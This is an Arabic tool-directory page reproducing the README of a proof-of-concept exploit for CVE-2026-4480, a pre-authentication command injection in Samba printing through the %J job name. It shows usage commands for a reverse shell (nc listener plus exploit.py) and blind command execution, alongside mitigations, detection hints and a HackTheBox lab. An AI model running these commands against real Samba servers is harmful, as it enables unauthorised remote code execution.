Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-4480-PoC — استغلال لإثبات المفهوم لـ CVE-2026-4480، حقن أوامر عن بعد غير مصادق عليه في نظام الطباعة في Samba عبر معلمة اسم المهمة %J. يشمل وضعي تنفيذ الأوامر: الصدفة العكسية والتنفيذ الأعمى. | Kitploit
أدوات/GitHubGitHub/thecybergeek/cve-2026-4480-poc
الاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubthecybergeek/cve-2026-4480-poc

CVE-2026-4480-PoC

استغلال لإثبات المفهوم لـ CVE-2026-4480، حقن أوامر عن بعد غير مصادق عليه في نظام الطباعة في Samba عبر معلمة اسم المهمة %J. يشمل وضعي تنفيذ الأوامر: الصدفة العكسية والتنفيذ الأعمى.

عرض المستودع
215منذ 2 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-4480: إثبات ثغرة حقن أمر الطباعة (%J) في Samba

هام — اقرأ هذا أولاً:
هذا المستودع و exploit.py مُقدمون لأغراض تعليمية وبحثية فقط. لا تستخدم هذا الكود ضد أنظمة أو شبكات أو خدمات ليس لديك تصريح كتابي صريح لاستخدامها. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني وغير أخلاقي. باستخدام هذا الكود، فإنك توافق على الامتثال للقوانين والسياسات المؤسسية المعمول بها.

تنفيذ أوامر عن بُعد غير مصادق عليه في نظام الطباعة في Samba. عندما ينتهي تخزين مهمة طباعة، يقوم Samba بتشغيل print command المُهيأ من خلال system()، مع استبدال %s (مسار ملف التخزين المؤقت) و %J (اسم المهمة المُقدم من العميل) في السلسلة النصية. قبل الإصلاح، كان اسم المهمة يُمرر مع تحويل واحد فقط ' → _ ولا شيء آخر، لذا فإن |, ;, &, المسافات, <, > وعلامات التنصيص الخلفية تصل جميعها إلى الصدفة. وبالتالي فإن print command الذي يشير إلى %J هو مصدر حقن في الصدفة، وبما أن المستخدمين الضيوف قد يقدمون مهام طباعة، فإن المشكلة قبل المصادقة.

  • CVE: CVE-2026-4480
  • CVSS: 10.0
  • تم الإصلاح في: Samba 4.22.10, 4.23.8, 4.24.3
  • المتأثر: واجهات الطباعة الخلفية التي تشغل print command خارجي يشير إلى %J (نمط printing = sysv). printing = cups / iprint تعمل من خلال واجهة CUPS البرمجية و ليست متأثرة.

المتطلبات

  • لينكس مع روابط Samba الخاصة بلغة Python:
    root@kitploit:~
    sudo apt install python3-samba
    
  • وصول شبكي إلى منفذ SMB الهدف (445/139).
  • مشاركة طابعة يمكن للضيوف الوصول إليها على الهدف يكون print command فيها يشير إلى %J.

الاستخدام

root@kitploit:~
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]

الصدفة العكسية

root@kitploit:~
# الطرفية 1: المستمع
nc -lvnp 4444

# الطرفية 2: تشغيل الاستغلال
python3 exploit.py 10.129.244.177 10.10.14.100 4444

يجب أن تحصل على صدفة كحساب خدمة الطباعة (مثل nobody).

تشغيل أمر واحد (أعمى)

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'

نظرًا لأن التنفيذ أعمى (يتم تشغيل الأمر على الخادم ولا يُرجع شيئًا على قناة RPC)، قم بتأكيده خارج النطاق أولاً، على سبيل المثال رد اتصال ICMP تراقبه باستخدام tcpdump -ni tun0 icmp:

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'

الكشف / التخفيف

  • قم بتثبيت التصحيح إلى 4.22.10 / 4.23.8 / 4.24.3 (أو أحدث).
  • إذا لم تستطع تثبيت التصحيح، ضع الماكرو بين علامتي اقتباس: print command = /usr/local/bin/print-helper %s '%J'، أو احذف %J، أو انتقل إلى printing = cups.
  • ابحث عن عمليات smbd التي تُشغل الصدف (sh/bash/nc/python/curl) وأسماء الملفات التي تحتوي على محارف صدفي.

التمرين على HackTheBox

لقد قمت بإنشاء صندوق على HackTheBox باسم Abducted لعرض الثغرة وإعطائك مثالاً عمليًا على كيفية استغلال المهاجمين لها في بيئة غير مهيأة بشكل صحيح.

تنزيل الأداة
الوسيط / الخيارالمعنى
rhostمضيف Samba الهدف / IP
lhostIP المستمع الخاص بك
lportمنفذ المستمع الخاص بك
-P, --printerاسم مشاركة الطابعة للضيوف (الافتراضي: HP-Reception)
-c, --cmdتشغيل أمر مخصص بدلاً من الصدفة العكسية